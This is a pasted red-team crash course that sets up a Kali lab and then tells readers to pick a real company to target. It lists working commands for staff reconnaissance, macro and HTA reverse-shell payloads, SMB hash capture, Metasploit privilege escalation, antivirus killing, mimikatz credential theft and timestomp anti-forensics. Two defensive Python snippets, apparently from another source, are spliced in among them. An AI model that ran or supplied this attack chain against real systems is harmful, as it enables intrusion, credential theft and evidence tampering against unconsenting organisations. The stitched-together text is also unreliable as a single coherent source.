a guest
Jul 22nd, 2017
##############################
# Hacking Crash Course Day 1 #
# Luke Ager                  #
##############################



###############
# Virtual BOX #
###############

- Although you can get the machines working in VMware Workstation or Fusion, I'll be supporting VirtualBox for this course. You can use other products if you are comfortable with their correct usage.

https://www.virtualbox.org/wiki/Downloads


#####################################
# Download the attack iso from Kali #
#####################################
https://www.kali.org/downloads/
Install it (do not boot live).


###########################
# Download the victim VM  #
###########################
https://drive.google.com/open?id=0BzsF4HrNTtXzemt6R1gybVZRczQ
pass: Password1


########################################
# Boot up the VMs                      #
########################################

Before you boot, check that the network adapters are bridged and that all guests are on the same network and can ping each other.

Log into your Kali box with the credentials you set during the install.


###########################
# Finally getting started #
###########################


msfupdate

msfconsole


##############################################
# Run any Linux command inside of MSFConsole #
##############################################
ls

pwd

ping -c1 yahoo.com

nmap yahoo.com

###############
# Note taking #
###############

Keep notes in Keepnote.

#############################################################
# Congratulations you are now a pentester, now get to work! #
#############################################################
You are a pentester for ACME Corp and have been assigned to a new customer to conduct a red teaming test. You must gain access within the rules of engagement agreed with the customer.
For this engagement, the customer has ruled out physical contact. The test must be limited to remote attacks only; no on-premise social engineering.

The customer is... (find one)
(note - aim for an SME or enterprise organisation - you must not attack offensively and you accept all responsibility for your actions.)

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
########################################
# RECON #
########################################
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

- Let's start with some simple DNS recon.
Understand the attack surface and find a way in. Easy but very effective.


fierce -dns target.com
dnsmap target.com

Look for remote worker access: VPN, Citrix, Outlook Web Access.


-------------------------------
- Now that you have DNS names, you can probe them more deeply with port scans to look for misconfigured ports or weaknesses. This usually gives results for the smaller companies; it doesn't usually give much on the bigger ones. In honesty, I do not usually port scan the perimeter, but there is certainly value in doing this. Personally, I attack users for credentials and then gain access the easy way.


########################################
# NMAP Example #
########################################

nmap target.com -A

(Do a full port scan, banner grab and OS fingerprint. This is loud, but on the external perimeter that is not such a big issue.)

You can also scan with Metasploit if you prefer: use the auxiliary scanner modules.


########################################
# Record all your findings in Keepnote #
########################################

Now that we have an understanding of the perimeter, let's look for targets. People are always the way in!

Old school is still the best:

theharvester -d target.com -b all -f target

Now we have some employees and their email addresses. Let's go hunting for the right target!

My personal fav is LinkedInt, however there is currently a bug. Worth checking on.

####################################
# Use Maltego to resource targets. #
####################################
Maltego is not always the answer, but it does help with SE recon. Find a target and understand more about them before moving into weaponisation.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
########################################
# WEAPONISATION #
########################################
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!


##################################
# Basic Client-Side Exploitation #
##################################

git clone https://github.com/Veil-Framework/Veil-Evasion
cd Veil-Evasion/
cd setup
./setup.sh -c

Veil-Evasion.py -p powershell/meterpreter/rev_https -c LHOST=192.168.1.13 LPORT=443 PROXY=Y --overwrite

Copy the payload path.

python macro_safe.py %PATH FROM ABOVE% %Filename%

Copy the output into an MS Office Word macro.

Set the macro to run from AutoOpen(), as detailed here: http://wordmvp/FAQs/MacrosVBA/DocumentEvents.htm



##################################
# Metasploit server               #
##################################

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.1.13
set lport 443
set exitonsession false
exploit -j


(If you have speakers on Kali:
back
load sounds
)


####################################################
# What if Macros don't work? ....The FireEye effect. #
####################################################

Sometimes tier 1/2 clients will have sandboxing solutions, so sometimes we need to get creative. Use Windows features such as UNC/SMB and poor egress filtering to grab hashes. If that doesn't work, try HTA files.


git clone https://github.com/vysec/genHTA


cd genHTA
python genHTA.py

Complete the questions.
ls - should show output.hta

Run:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.1.13 LPORT=443 -f hta-psh

Copy the output and paste it into the below:

vim output.hta

Edit where the ' character begins in the Modifyme() function.

mv output.hta /var/www/html

service apache2 start

Browse to IP/output.hta from the Windows victim, then download and run the file using IE.
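
As a defensive counterpart to the HTA step above: an added Python example, not from the course or the genHTA project, that flags the shape hta-psh output leaves in an .hta file (a WScript.Shell object launching powershell with an -EncodedCommand argument) and decodes the base64 UTF-16LE command so an analyst can read it. The sample HTA it builds is constructed and only carries a harmless Write-Host.

```python
import base64
import re

# Script in an HTA that instantiates a shell object; msfvenom's hta-psh output does this.
SHELL_OBJ = re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"\s*\)', re.I)
# A powershell command line, captured up to the closing quote or tag.
PS_CMD = re.compile(r'powershell(?:\.exe)?[^"\'<]*', re.I)
# The -e / -enc / -EncodedCommand argument and its base64 blob.
ENC_ARG = re.compile(r'-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})', re.I)


def decode_encoded_command(blob: str):
    """-EncodedCommand is base64 over UTF-16LE text; return the text, or None if it is not."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_hta(text: str) -> dict:
    """Report shell-object use, every powershell command line, and decoded -e payloads."""
    out = {"spawns_shell": bool(SHELL_OBJ.search(text)), "powershell_cmds": [], "decoded": []}
    for m in PS_CMD.finditer(text):
        cmd = m.group(0)
        out["powershell_cmds"].append(cmd)
        enc = ENC_ARG.search(cmd)
        if enc:
            dec = decode_encoded_command(enc.group(1))
            if dec is not None:
                out["decoded"].append(dec)
    return out


def build_sample_hta() -> str:
    """Constructed HTA in the shape of hta-psh output; the encoded command is harmless."""
    enc = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()
    return ('<html><head><script language="VBScript">\n'
            'Set o = CreateObject("WScript.Shell")\n'
            f'o.Run "powershell.exe -nop -w hidden -e {enc}", 0, False\n'
            '</script></head></html>')
```

The decoded text is what a mail gateway or EDR rule should match on; the base64 form changes with every build.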

####################################################
# When all else fails or you just want to double up #
####################################################

Add a Quick Part SMB reference to your Office doc.

Insert > Quick Parts,
Field,
IncludePicture,
add file://IP/file
(data not stored within document)

Listen for the hash using Metasploit or Responder.

use auxiliary/server/capture/smb
show options
run

or

responder
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
########################################
# DELIVERY #
########################################
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Get creative.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
########################################
# Exploitation #
########################################
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Technically we aren't exploiting, but depending on the exploits available during your test you may use 0-days or exploits. When they aren't available due to patching, social engineering is needed. 99% of my work is reliant on SE and user mistakes, not exploitation.


!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
########################################
# COMMAND & CONTROL #
########################################
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Get shell. Simples.


###########################
# Client-Side Enumeration #
###########################


- You can list the active sessions by typing:

sessions -l


- You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with):


sessions -i 1


- You should now see Metasploit's meterpreter prompt.


********************************** Figure out who and where you are **********************************

meterpreter> sysinfo


meterpreter> getuid


meterpreter> ipconfig


meterpreter> run post/windows/gather/checkvm


meterpreter> run get_local_subnets



********************************** Escalate privileges and get hashes **********************************

Most of the below won't work on up-to-date machines... my preference is option 4. Older machines will have more success if the patch level is out of date.
meterpreter> use priv


--Option 1: GetSystem
meterpreter> getsystem

--Option 2:
meterpreter > run post/windows/escalate/getsystem

--Option 3:
meterpreter> background
back
use post/windows/escalate/droplnk
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.230.134 (Make sure you change this to your IP address)
set LPORT 1234
exploit

--Option 4:
use exploit/windows/local/bypassuac
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.230.134 (Make sure you change this to your IP address)
set LPORT 12345
exploit

--Option 5:
use exploit/windows/local/service_permissions
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.230.134 (Make sure you change this to your IP address)
set LPORT 5555
exploit

--Option 6:
use exploit/windows/local/trusted_service_path
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.230.134 (Make sure you change this to your IP address)
set LPORT 4567
exploit


--Option 7:
use exploit/windows/local/ppr_flatten_rec
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.230.134 (Make sure you change this to your IP address)
set LPORT 7777
exploit

--Option 8:
use exploit/windows/local/ms_ndproxy
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.230.134 (Make sure you change this to your IP address)
set LPORT 7788
exploit


--Option 9:
use exploit/windows/local/ask
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.230.134 (Make sure you change this to your IP address)
set LPORT 7799
exploit


meterpreter > getuid
Server username: win7-64-victim\Workshop
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

--------------------------------------------------------

meterpreter> run killav

meterpreter> run post/windows/gather/hashdump

meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)

meterpreter > migrate 2800 (your process ID WILL NOT be 2800, but make sure you use one that is running as NT AUTHORITY\SYSTEM)

meterpreter> run post/windows/gather/credentials/credential_collector



************ Stealing credentials and certificates ************
- NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.

meterpreter > getsystem

meterpreter > load mimikatz

meterpreter > kerberos

meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

meterpreter > msv <-- Your AD password

meterpreter > livessp <-- Your Windows 8 password

meterpreter > ssp <-- Your Outlook password

meterpreter > tspkg <-- Your AD password

meterpreter > wdigest <-- Your AD password

meterpreter > mimikatz_command -f crypto::listStores

meterpreter > mimikatz_command -f crypto::listCertificates

meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER

meterpreter > mimikatz_command -f crypto::patchcapi

meterpreter> search -d <directory> -f <file-pattern>


********************************** Enumerate the host you are on **********************************

meterpreter > run getcountermeasure

meterpreter > run post/windows/gather/enum_applications

meterpreter > run post/windows/gather/enum_logged_on_users

meterpreter > run post/windows/gather/usb_history

meterpreter > run post/windows/gather/enum_shares

meterpreter > run post/windows/gather/enum_snmp

meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run


********************************** Prove access **********************************

meterpreter> upload /home/proof.txt c:\\

meterpreter > timestomp C:\\proof.txt -v

meterpreter > timestomp C:\\proof.txt -m "12/12/2014 12:12:14"

meterpreter > timestomp C:\\proof.txt -v
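
The forensic side of the timestomp step above: an added Python example, not from the course, with two stat-based heuristics an analyst can run over a suspect file (whole-second timestamps where the filesystem keeps sub-second precision, and an mtime far older than the inode change or creation time). The file it checks is constructed in a temporary directory, and the 2014 value is the one from the command above.

```python
import os
import tempfile
from datetime import datetime, timezone

NS = 1_000_000_000


def timestamp_anomalies(path: str) -> list:
    """Stat-based hints that a file's timestamps were rewritten; [] means nothing odd."""
    st = os.stat(path)
    reasons = []
    # Timestamp-setting tools usually pass whole seconds, while genuine writes on ext4, NTFS
    # or APFS carry sub-second precision. Second-granularity filesystems (FAT) will false-positive.
    for label, ns in (("mtime", st.st_mtime_ns), ("atime", st.st_atime_ns)):
        if ns % NS == 0:
            reasons.append(f"{label} has zero sub-second part")
    # On Linux st_ctime is the inode change time, which user space cannot set; on Windows it is
    # the creation time. Content "modified" long before that record is a lead, not proof
    # (archives extracted with preserved mtimes trigger it too).
    if st.st_mtime_ns < st.st_ctime_ns - NS:
        reasons.append("mtime precedes ctime")
    return reasons


def demo() -> tuple:
    """Constructed sample: write a file, then back-date it to the value used in the course."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "proof.txt")
        with open(path, "w") as f:
            f.write("constructed proof file\n")
        before = timestamp_anomalies(path)
        # Same effect as: timestomp C:\proof.txt -m "12/12/2014 12:12:14" (a whole-second value)
        stomped = int(datetime(2014, 12, 12, 12, 12, 14, tzinfo=timezone.utc).timestamp()) * NS
        os.utime(path, ns=(stomped, stomped))
        after = timestamp_anomalies(path)
    return before, after
```

On NTFS the stronger check is comparing $STANDARD_INFORMATION against $FILE_NAME in the MFT, which timestomp -m does not touch; this stat-only version is what you can run without a disk image.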